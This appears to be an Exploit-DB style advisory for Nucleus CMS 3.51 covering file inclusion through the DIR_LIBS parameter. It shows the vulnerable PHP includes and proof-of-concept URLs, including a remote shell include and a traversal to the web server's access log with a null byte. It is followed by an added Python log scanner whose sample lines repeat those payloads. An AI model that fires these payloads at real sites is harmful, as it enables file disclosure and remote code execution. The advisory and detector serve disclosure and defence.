Vendor: Nucleus CMS
By: eidelweiss
CVSS: 8,1 (HIGH)
Type: Multiple Vulnerability
CWE: 22, 94, 79
Product Name: Nucleus CMS
Affected Version From: 3.51
Affected Version To: 3.51
Patch Exists: YES
Related CVE: CVE-2009-4010, CVE-2009-4011, CVE-2009-4012
CPE: a:nucleus_cms:nucleus_cms
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability

Nucleus CMS is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to view arbitrary files from the affected computer with the privileges of the webserver process. This may aid in further attacks.

Nucleus CMS is prone to a local-file-inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to view arbitrary files from the affected computer with the privileges of the webserver process. This may aid in further attacks.

Nucleus CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Mitigation:

Upgrade to the latest version of Nucleus CMS.

Exploit-DB raw data:

########################################################
    Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability
########################################################
 
 
Author: eidelweiss
 
[+]Software:	Nucleus CMS
[+]Version:	Nucleus v3.51 (other or lower versions may also be affected)
[+]License:	GNU/GPL (Free Software)
[+]Homepage:	http://nucleuscms.org/download.php
[+]Download:	http://prdownloads.sourceforge.net/nucleuscms/nucleus3.51.zip?download
########################################################
 
[!]Discovered:	eidelweiss
[!]Contact:	eidelweiss[at]cyberservices[dot]com
[!]Thanks:	sp3x (securityreason) - r0073r & 0x1D (inj3ct0r) loneferret - Exploits - dookie2000ca (exploit-db)
		JosS (hack0wn) - g1xx_achmed - [D]eal [C]yber - Syabilla_putri (i miss u so much too)
 
########################################################
 
-=[Description]=-
 
    Nucleus allows you to easily maintain your own weblog(s) on your own server. It offers a system that is easy to install, but still offers maximum flexibility. (PHP4/MySQL)

########################################################
 
	-=[Vuln Code]=-
**********************************
[-][path_to_nucleus]/action.php

$CONF = array();
require('./config.php');

// common functions
// include path is prefixed with $DIR_LIBS, the variable the PoC sets from the query string
include_once($DIR_LIBS . 'ACTION.php');

$action = requestVar('action');
$a =& new ACTION();
$errorInfo = $a->doAction($action);

**********************************
[-][path_to_nucleus]/nucleus/xmlrpc/server.php

$CONF = array();
require("../../config.php");	// include Nucleus libs and code
// both includes are prefixed with $DIR_LIBS
include($DIR_LIBS . "xmlrpc.inc.php");
include($DIR_LIBS . "xmlrpcs.inc.php");

**********************************
[-][path_to_nucleus]/nucleus/plugins/skinfiles/index.php

$strRel = '../../../';
require($strRel . 'config.php');
// include path is prefixed with $DIR_LIBS
include($DIR_LIBS . 'PLUGINADMIN.php');

########################################################
 
	-=[ P0C ]=-
 
	Http://127.0.0.1/[path_to_nucleus]/action.php?DIR_LIBS= [inj3ct0r sh3ll]
 
	Http://127.0.0.1/[path_to_nucleus]/nucleus/xmlrpc/server.php?DIR_LIBS= [inj3ct0r sh3ll]

	Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=../../../var/log/httpd/access_log%00
				or
	Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=[lfi]%00

###############################=[E0F]=###################################
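
A detection check for the request pattern shown in the PoC above, added here as an example; it is not part of the original advisory or of Nucleus CMS. It scans web access log lines for requests that set DIR_LIBS in the query string and labels each hit. The log format (common/combined), the function names and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# The three scripts the advisory lists as including files via $DIR_LIBS.
AFFECTED = ("/action.php", "/nucleus/xmlrpc/server.php",
            "/nucleus/plugins/skinfiles/index.php")

def classify(value):
    """Name the suspicious traits of a percent-decoded DIR_LIBS value."""
    traits = []
    if re.match(r"(?i)[a-z][a-z0-9+.-]*://", value):
        traits.append("remote-url")
    if "../" in value or "..\\" in value:
        traits.append("traversal")
    if "\x00" in value:
        traits.append("null-byte")
    return traits or ["param-override"]

def scan(lines):
    """Return (line_no, path, traits) for every request that sets DIR_LIBS."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue  # not a request line we understand; POST bodies are not logged
        url = urlsplit(m.group(1))
        # parse_qsl percent-decodes values, so %00 arrives here as a NUL byte.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == "DIR_LIBS":  # exact match: PHP variable names are case-sensitive
                traits = classify(value)
                if url.path.endswith(AFFECTED):
                    traits.append("listed-script")
                hits.append((no, url.path, traits))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /blog/index.php?itemid=3 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] "GET /blog/nucleus/plugins/skinfiles/index.php?DIR_LIBS=../../../var/log/httpd/access_log%00 HTTP/1.1" 200 812',
    '192.0.2.44 - - [01/Jan/2010:10:00:09 +0000] "GET /blog/action.php?DIR_LIBS=http://host.example/ HTTP/1.1" 200 64',
    '192.0.2.44 - - [01/Jan/2010:10:00:12 +0000] "GET /blog/action.php?action=votepositive&itemid=3 HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Any hit is worth review, since a legitimate client has no reason to send DIR_LIBS at all; the traits only help with triage.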